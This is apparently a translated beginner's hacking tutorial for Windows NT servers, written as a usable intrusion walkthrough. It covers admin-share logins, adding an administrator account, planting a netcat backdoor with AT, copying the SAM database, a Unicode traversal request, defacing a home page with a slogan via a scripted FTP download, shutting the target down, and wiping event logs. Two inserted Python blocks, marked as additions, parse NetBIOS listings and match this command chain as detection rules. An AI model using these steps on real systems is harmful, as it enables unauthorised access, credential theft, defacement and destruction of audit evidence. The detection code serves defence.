Beginner's hacker command collection

Source: Internet
Author: User
Tags: net command, net time

1. NET

As long as you have a user name and password for an IP address, you can connect to it with IPC$!

Here we assume the user you obtained is x1, the password is 123456, and the peer IP address is 127.0.0.1.

net use \\127.0.0.1\ipc$ 123456 /user:x1

The command to disconnect is

net use \\127.0.0.1\ipc$ /delete

The following operations can only be used after you have logged on.

Next, creating a user. Because the SA permission is equivalent to the system's super user, we add a user heibai with the password lovechina:

net user heibai lovechina /add

If the command reports success, we can add the user to the Administrators group:

net localgroup Administrators heibai /add

Now let's talk about mapping the other party's C drive. Any other drive works too, as long as it exists. Here we map the other party's C drive to the local drive Z:

net use z: \\127.0.0.1\c$
net start telnet

This is how you start the other party's Telnet service.

Next we activate the Guest user. Guest is a default NT user that cannot be deleted? I'm not sure whether that is so; my Windows 2000 will not let me delete it.

Here we change the guest user's password to lovechina. The same works for other users, as long as you have the permission!

net user guest lovechina

Net command is really powerful!

2. AT

Generally, a hacker leaves a backdoor after an intrusion, that is, a Trojan horse. How do you start the Trojan once you have uploaded it? Use the AT command. Assume you have logged on to the server. First you need to get the other party's time:

net time \\127.0.0.1

A time is returned. Assume that the time is . Now create a new job with ID = 1:

at \\127.0.0.1 12:3 nc.exe

Assume that a Trojan named nc.exe is stored on the other party's server.

NC is short for NETCAT; it has been renamed to make it easier to type. It is a Telnet-like service on port 99. When the time comes, we can connect to the other party's port 99, and so we have planted a Trojan horse on the other party.

3. Telnet

This command is very practical. It connects to a remote host; normally a user name and password are required, but since you have planted a Trojan on the other party, you connect directly to the port the Trojan opened.

telnet 127.0.0.1 99

This connects you to the other party's port 99, after which you can run commands on the other party, which is now a zombie.

4. FTP

It can upload your stuff to the other machine. You can apply for a space that supports FTP upload; if you cannot find one in China, I recommend www.51.NET, which is good. After the application is completed it gives you a user name, a password and an FTP server. Before uploading you need to log in first. Here we assume the FTP server is www.51.NET, the user name is HUCJS and the password is 654321.

ftp www.51.net

It will ask you to enter the user name and password.
Next, uploading. Assume the file you want to upload is INDEX.HTM, located in C:\, and you want to upload it to the other party's D:\

put c:\index.htm d:\

Suppose instead you want to fetch INDEX.HTM from the other party's drive C to drive D of your own machine:

get c:\index.htm d:\

5. Copy

Next, let's talk about copying a local file to the other party's hard disk. You need to establish an IPC$ connection first. To copy index.htm from the local C drive to the C drive of 127.0.0.1:

copy index.htm \\127.0.0.1\c$\index.htm

If you want to copy it to drive D instead, just change c$ to d$, that's all!

If you want to copy it to the WINNT directory, you need to enter

copy index.htm \\127.0.0.1\admin$\index.htm

admin$ is the WINNT directory.

Copying the other party's files: for everyone's information, the NT backup of the account database is stored at x:\winnt\repair\sam._ (sam._ is the database file name). To copy the database of 127.0.0.1 to the local drive C:

copy \\127.0.0.1\admin$\repair\sam._ c:\

6. Set

If you get into a machine and want to hack it (an idea that only makes sense in special cases), port 80 must of course be open; perhaps you want to deface its home page. In that case, use the SET command! The following is my result. I will analyze it: just find the home page.

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=(the IP address of the host currently logged into; the address is removed here)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot   (the location of the home page: whatever follows PATH_TRANSLATED= is the directory where the home page is stored, here E:\vlroot)
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX
REMOTE_HOST=XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/...%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0   (the other party uses IIS/3.0)
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
Windir=D:\WINNT

The pink line is the location of the other party's home page. This is a very clumsy method, but it is the only way to find the name of the home page with certainty: when you DIR that directory you will see a lot of files; open each of them in the browser as XX.XX.XX.XX/filename, and the one that looks exactly the same as XX.XX.XX.XX is the home page.

7. Nbtstat

If you scan an NT host and find one of the ports from 136 to 139 open, use this command to get the user names. By the way, this is NetBIOS. After obtaining a user name you can guess the password; for example, try a simple password that is the same as the user name. If that fails, just crack it!

Many NT hosts on the Internet have these ports open. You can practice on them and analyze the results. The command is

nbtstat -A xx.xx.xx.xx

The -A must be capitalized. The result looks like this:

NetBIOS Remote Machine Name Table

Name                Type     Status
---------------------------------------------
PENTIUMII      <00> UNIQUE   Registered
PENTIUMII      <20> UNIQUE   Registered
ORAHOTOWN      <00> GROUP    Registered
ORAHOTOWN      <1C> GROUP    Registered
ORAHOTOWN      <1B> UNIQUE   Registered
PENTIUMII      <03> UNIQUE   Registered
INet~Services  <1C> GROUP    Registered
IS~PENTIUMII...<00> UNIQUE   Registered
ORAHOTOWN      <1E> GROUP    Registered
ORAHOTOWN      <1D> UNIQUE   Registered
..__MSBROWSE__.<01> GROUP    Registered

MAC Address = 00-E0-29-14-35-BA

The pink entry is the user who has logged on to this system. Perhaps you don't know how to read it: do you see the numbers? Wherever the number is <03>, the name in front of it is the user, and here the user is PENTIUMII.
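As an added example that is not part of the original page, the Python below parses a name table like the one above and reports what such a listing reveals. It builds on the page's <03> rule with the well-known NetBIOS suffix meanings (the machine registers its own name with <03>; any other <03> UNIQUE name is a logged-on user), so an administrator can check what an unfiltered 137-139 exposes on their own host. The sample table is constructed, modelled on the page's, with the extra name JSMITH added to show the logged-on-user case.

```python
import re
# Constructed nbtstat -A listing modelled on the page's table, with JSMITH
# added to show a logged-on user; not captured from any real host.
SAMPLE_NBTSTAT = """\
PENTIUMII      <00>  UNIQUE      Registered
PENTIUMII      <20>  UNIQUE      Registered
ORAHOTOWN      <00>  GROUP       Registered
ORAHOTOWN      <1C>  GROUP       Registered
PENTIUMII      <03>  UNIQUE      Registered
JSMITH         <03>  UNIQUE      Registered
INet~Services  <1C>  GROUP       Registered
IS~PENTIUMII...<00>  UNIQUE      Registered
MAC Address = 00-E0-29-14-35-BA
"""
SUFFIX_MEANING = {  # well-known NetBIOS suffixes, keyed by (suffix, type)
    ("00", "UNIQUE"): "workstation service (computer name)",
    ("00", "GROUP"): "domain or workgroup name",
    ("03", "UNIQUE"): "messenger service (computer name or logged-on user)",
    ("20", "UNIQUE"): "file server service (host offers shares)",
    ("1C", "GROUP"): "domain controllers (IIS when the name is INet~Services)",
}
ENTRY = re.compile(r"^\s*(?P<name>\S.*?)\s*<(?P<suffix>[0-9A-F]{2})>\s+"
                   r"(?P<kind>UNIQUE|GROUP)\s+(?P<status>\S+)", re.I)

def parse_name_table(text):
    """One dict per registered name; header lines and the MAC line are skipped."""
    entries = []
    for m in filter(None, map(ENTRY.match, text.splitlines())):
        e = m.groupdict()
        e["suffix"], e["kind"] = e["suffix"].upper(), e["kind"].upper()
        e["meaning"] = SUFFIX_MEANING.get((e["suffix"], e["kind"]), "unknown")
        entries.append(e)
    return entries

def summarize_exposure(text):
    """What an unfiltered 137-139 reveals to anyone who asks, from the table alone."""
    entries = parse_name_table(text)
    names = lambda s, k: [e["name"] for e in entries if (e["suffix"], e["kind"]) == (s, k)]
    computer = next((n for n in names("00", "UNIQUE") if "~" not in n), None)
    domain = next(iter(names("00", "GROUP")), None)
    return {
        "computer": computer,
        "domain": domain,
        # every <03> UNIQUE that is not the machine itself is a logged-on user name
        "logged_on_users": [n for n in names("03", "UNIQUE") if n != computer],
        "offers_shares": bool(names("20", "UNIQUE")),
        "domain_controller": domain in names("1C", "GROUP"),
        "runs_iis": "INet~Services" in names("1C", "GROUP"),
    }
```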

8. Shutdown

The command to shut down the other party's NT server:

shutdown \\<IP address> /t:20

NT will shut down automatically after 20 seconds. Think twice before running this command: it causes a great loss to the other party, so please be a conscientious hacker.

9. DIR

There is nothing much to say about this command, but it is very important. It lists all the files and folders in a directory. You can try it locally.

10. Echo

The famous Unicode vulnerability can be used to easily hack hosts that have it. Let's assume we want to write "The Nanjing massacre is like a mountain, and no *** can deny it!" into index.htm. There are two ways; let's see what the difference is.

echo The Nanjing massacre is like a mountain, and no *** can deny it! > index.htm

echo The Nanjing massacre is like a mountain, and no *** can deny it! >> index.htm

The first overwrites the original content of index.htm, writing "The Nanjing massacre is like a mountain, and no *** can deny it!" into index.htm; the second appends "The Nanjing massacre is like a mountain, and no *** can deny it!" to index.htm.

">>" appends to the file, and ">" overwrites the original file. You can try it locally.

You may ask: so what is interesting about this? In fact, it can be used to download a home page into the other party's directory.

(1) First, apply for a free home page.

(2) Use echo to create a txt file in a writable directory (taking the chinaren server as an example):

open upload.chinaren.com   (the FTP server)
cnhack   (the user name from your application)
test   (the password from your application)
get index.htm c:\inetpub\wwwroot\index.htm   (download the index.htm on your space to the other party's c:\inetpub\wwwroot\index.htm)
bye   (exit the ftp session; like leaving DOS under Windows 98 with EXIT)

Specifically:

Enter echo open upload.chinaren.com > c:\cnhack.txt
Enter echo cnhack >> c:\cnhack.txt
Enter echo 39abs >> c:\cnhack.txt
Enter echo get index.htm c:\inetpub\wwwroot\index.htm >> c:\cnhack.txt

Finally, enter ftp -s:c:\cnhack.txt (the ftp -s parameter executes the commands in the file). When the command completes, the file has been downloaded to the location you specified.

Note: after obtaining the file, delete cnhack.txt (if you don't, the password in it is easily exposed to others). Remember: del c:\cnhack.txt.

11. Attrib

This command sets file attributes. If you want to hack a website and the file attribute of its home page is set to read-only, that is a nuisance: you can neither delete it nor overwrite it. But don't worry, this command takes care of it.

attrib -r index.htm

This command removes the read-only attribute from index.htm. If you change "-" to "+", the file is set to read-only.

attrib +r index.htm

This command sets index.htm to read-only.

12. Del

Don't faint when you see this title! Now we are leaving 127.0.0.1. Before leaving, you must delete the logs! Or do you want to get caught? NT keeps logs in these places:

del C:\winnt\system32\logfiles\*.*
del C:\winnt\system32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

Just delete these. On some systems NT is installed on drive D or another drive; in that case change C to that drive.
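The command sequence this page walks through (the IPC$ connection, user creation and group addition in section 1, the AT job in section 2, the scripted ftp -s transfer in section 10 and the log deletion above) is exactly the chain a defender wants to catch in process-creation auditing. As an added example that is not part of the original page, the Python below runs a few pattern rules over a constructed (account, command line) sample following that sequence and flags the account that trips most of the chain; rule names and the sample accounts are assumptions.

```python
import re

# Constructed process-creation audit sample as (account, command line) pairs,
# following the command sequence on this page; not real log data.
SAMPLE_EVENTS = [
    ("alice", r"net use \\127.0.0.1\ipc$ 123456 /user:x1"),
    ("alice", r"net user heibai lovechina /add"),
    ("alice", r"net localgroup Administrators heibai /add"),
    ("alice", r"net use z: \\127.0.0.1\c$"),
    ("bob",   r"net time \\127.0.0.1"),
    ("alice", r"at \\127.0.0.1 12:30 nc.exe"),
    ("alice", r"ftp -s:c:\cnhack.txt"),
    ("alice", r"del C:\winnt\system32\logfiles\*.*"),
    ("alice", r"del C:\winnt\system32\config\*.evt"),
    ("carol", r"dir C:\inetpub\wwwroot"),
]

# Each rule names one step of the page's walkthrough. Patterns are deliberately
# loose (case-insensitive, any drive letter) because the author notes that
# drive C may be D on other systems.
RULES = [
    ("admin_share_connection", re.compile(r"\bnet\s+use\b.*\\\\\S+?\\(ipc|c|admin)\$", re.I)),
    ("local_user_created",     re.compile(r"\bnet\s+user\b.*\s/add\b", re.I)),
    ("admin_group_addition",   re.compile(r"\bnet\s+localgroup\s+administrators\b.*\s/add\b", re.I)),
    ("remote_scheduled_job",   re.compile(r"^\s*at\s+\\\\\S+\s+\d{1,2}:\d{2}\s+\S+", re.I)),
    ("ftp_scripted_transfer",  re.compile(r"\bftp\b.*\s-s:", re.I)),
    ("event_log_deletion",     re.compile(r"\bdel\b.*\\(logfiles\\|config\\.*\.evt\b)", re.I)),
]

def scan(events):
    """Return (account, rule, command) for every event that matches a rule."""
    return [(acct, name, cmd) for acct, cmd in events
            for name, pat in RULES if pat.search(cmd)]

def rules_per_account(events):
    """Distinct rule names tripped by each account, sorted for stable output."""
    tripped = {}
    for acct, name, _ in scan(events):
        tripped.setdefault(acct, set()).add(name)
    return {acct: sorted(names) for acct, names in tripped.items()}

def suspicious_accounts(events, threshold=3):
    """Accounts covering at least `threshold` distinct steps of the chain;
    a single 'net use' is routine, the whole sequence is not."""
    return [a for a, names in rules_per_account(events).items() if len(names) >= threshold]
```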
